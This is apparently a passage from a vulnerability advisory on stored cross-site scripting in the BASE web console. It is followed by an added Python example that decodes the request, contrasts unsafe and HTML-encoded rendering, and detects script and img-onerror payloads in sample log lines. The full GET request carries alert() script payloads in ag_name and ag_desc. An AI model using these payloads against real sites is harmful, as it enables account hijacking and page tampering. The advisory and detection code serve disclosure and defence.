The POST request shown in Persistent-notes.txt can also be sent as a GET request, which gives the attacker a choice of delivery method (a GET payload fits in a plain link or an image source, so no form is needed). The ag_name and ag_desc parameters are not validated, so the script payloads are accepted as the group's name and description.

=== Request ===

GET /base/base_ag_main.php?ag_name=%3Cscript%3Ealert%28%22Name-XSS%22%29%3C%2Fscript%3E&ag_desc=%3Cscript%3Ealert%28%22Desc-XSS%22%29%3C%2Fscript%3E&submit=Create+Group&ag_action=create&caller=&num_result_rows=-1&current_view=-1&=action_arg HTTP/1.1
Host: 172.16.105.130
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://172.16.105.130/base/base_ag_main.php?ag_action=create
Cookie: PHPSESSID=dad4b449a7b0c4e0b397c29d960ae9c2

=== Response ===

...snip...

Create Group

ID # 3
Name
Description
...snip...
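As an added example (not code from the original advisory or from the BASE project), the following Python script parses the GET request above, decodes the ag_name and ag_desc values, renders them the unsafe way the advisory describes beside an output-encoded version of the same row, and flags the same kind of payload in a few constructed access-log lines. The table-row markup and the log lines are assumptions made for illustration; the request line is the one quoted above with the entity-mangled "&current_view" parameter restored.

```python
# Added example, not code from the BASE project or the original advisory.
# It parses the GET request quoted in the advisory, shows why the unvalidated
# ag_name/ag_desc values become script when echoed into HTML, shows the
# output-encoding fix, and flags the same payload in constructed log lines.
import html
import re
from urllib.parse import parse_qs, urlsplit

# Request line copied from the advisory ("&current_view" restored where the
# original text had it mangled into an HTML entity).
REQUEST_LINE = (
    "GET /base/base_ag_main.php?ag_name=%3Cscript%3Ealert%28%22Name-XSS%22%29%3C%2Fscript%3E"
    "&ag_desc=%3Cscript%3Ealert%28%22Desc-XSS%22%29%3C%2Fscript%3E&submit=Create+Group"
    "&ag_action=create&caller=&num_result_rows=-1&current_view=-1&=action_arg HTTP/1.1"
)


def parse_request_line(line):
    """Split an HTTP request line into (method, path, decoded query params).

    Blank values are kept so that empty parameters such as caller= survive.
    Only the first value of each parameter is returned."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    return method, parts.path, {k: v[0] for k, v in query.items()}


def render_group_row_vulnerable(group_id, name, desc):
    """Mirror of the unsafe behaviour the advisory describes: the submitted
    values are written into the page without encoding. The row markup is a
    hypothetical stand-in, not BASE's actual template."""
    return f"<tr><td>{group_id}</td><td>{name}</td><td>{desc}</td></tr>"


def render_group_row_fixed(group_id, name, desc):
    """Same row with HTML output encoding: '<', '>', '&' and quotes become
    entities, so the browser shows the payload as text instead of running it."""
    return (
        f"<tr><td>{int(group_id)}</td>"
        f"<td>{html.escape(name)}</td><td>{html.escape(desc)}</td></tr>"
    )


# Constructed Apache-style access log lines (not taken from the advisory).
ACCESS_LOG = [
    '172.16.105.1 - - [01/Jan/2010:10:00:00 +0000] "GET /base/base_ag_main.php'
    '?ag_action=create HTTP/1.1" 200 2140',
    '172.16.105.1 - - [01/Jan/2010:10:00:05 +0000] "GET /base/base_ag_main.php'
    '?ag_name=%3Cscript%3Ealert%28%22Name-XSS%22%29%3C%2Fscript%3E&ag_desc=test'
    '&ag_action=create HTTP/1.1" 200 2311',
    '172.16.105.1 - - [01/Jan/2010:10:00:09 +0000] "GET /base/base_ag_main.php'
    '?ag_name=Ops&ag_desc=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&ag_action=create'
    ' HTTP/1.1" 200 2311',
]

WATCHED_PARAMS = ("ag_name", "ag_desc")
# An HTML tag opener: '<', optional '/', then a letter (matches <script>, </script>, <img ...>).
TAG_RE = re.compile(r"<\s*/?\s*[a-z]", re.IGNORECASE)


def find_tag_injection(log_lines):
    """Return (line_no, param, decoded_value) for each watched parameter whose
    URL-decoded value contains an HTML tag opener. Decoding first matters:
    the raw log only shows %3C, never '<'."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for p in WATCHED_PARAMS:
            for value in params.get(p, []):
                if TAG_RE.search(value):
                    hits.append((n, p, value))
    return hits


if __name__ == "__main__":
    method, path, params = parse_request_line(REQUEST_LINE)
    print(method, path)
    print("ag_name =", params["ag_name"])
    print("unsafe :", render_group_row_vulnerable(3, params["ag_name"], params["ag_desc"]))
    print("encoded:", render_group_row_fixed(3, params["ag_name"], params["ag_desc"]))
    for hit in find_tag_injection(ACCESS_LOG):
        print("log hit:", hit)
```

The log check decodes the query before matching because the payload in the advisory only ever appears percent-encoded on the wire; a signature written against the literal "<script>" would miss it. The encoded row is the shape of the fix: whatever validation is added on input, the name and description must be HTML-encoded at the point they are written into the page.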